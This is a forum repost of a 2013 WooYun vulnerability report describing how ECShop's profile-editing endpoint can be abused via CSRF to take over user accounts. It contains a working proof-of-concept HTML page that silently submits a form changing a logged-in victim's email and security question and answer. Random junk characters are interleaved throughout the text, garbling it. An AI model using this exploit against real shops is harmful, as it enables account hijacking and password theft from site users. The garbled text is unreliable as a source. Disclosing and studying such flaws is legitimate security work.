简要描述:
z& F$ \9 |& I) ?ecshop在设计认证机制的时候存在一个问题,导致恶意用户可以窃取其他用户的密码,这个过程可以通过xss和csrf实现3 Q2 R! r/ m, ?
% _/ \2 ?6 c3 O( o: |) m
Demo For:http://www.wooyun.org/bug.php?action=view&id=395
1 K) G% y8 o# `7 s
7 m/ W$ F' b' h) Q详细说明:
6 u$ i* j" J2 ^ K8 c3 Q/ z利用csrf和xss可以突破官方所说的“障碍”: ~2 h9 e# Y6 G
xss版本已经有人说明
. [, S0 E3 O Y2 V# G$ W+ B( ]这里给出csrf版本
! i! J1 V4 e' E7 U" B
( u L8 m% f2 q: F2 ]5 u, D漏洞证明:& t( t7 j. g/ T/ @' F/ s: X
<html>- T2 Y4 N. b, _0 |3 f0 a0 w
<body>, A) |3 d% u |: u2 Y
<form action="http://www.wooyun.org/ecshop/user.php" method="POST">
' `2 |7 g5 f$ ?2 k) V/ |- w<INPUT TYPE="text" NAME="email" value="hack@wooyun.org">" |4 W; P% z; y8 `' j) ]- R
<INPUT TYPE="text" NAME="act" value="act_edit_profile">) g' a# j5 }. c' h1 }
<INPUT TYPE="text" NAME="sel_question" value="ecshop">
1 ?: g Z* D' A5 I( F1 q# L<INPUT TYPE="text" NAME="passwd_answer" value="exploit">
A. q$ e0 i: W2 x1 M1 ^* f</body>
1 Y* U! l4 p, X4 ?% S8 p8 c" Z<script>
7 \% U7 m. {" P: R* k5 tdocument.forms[0].submit();
: S1 C5 a( x. p, o, }</script>
2 u$ F- \' @+ l7 {</html>
1 H0 p; {( w( B; Y& _构造该网页,用户在登录情况下访问该网页将导致email以及一些其他安全信息丢失6 `+ z# e% k- ]& U, N
7 p: D% J' n3 y- K5 t2 i% i |
发表于 2013-2-20 08:30:14
收藏
支持
反对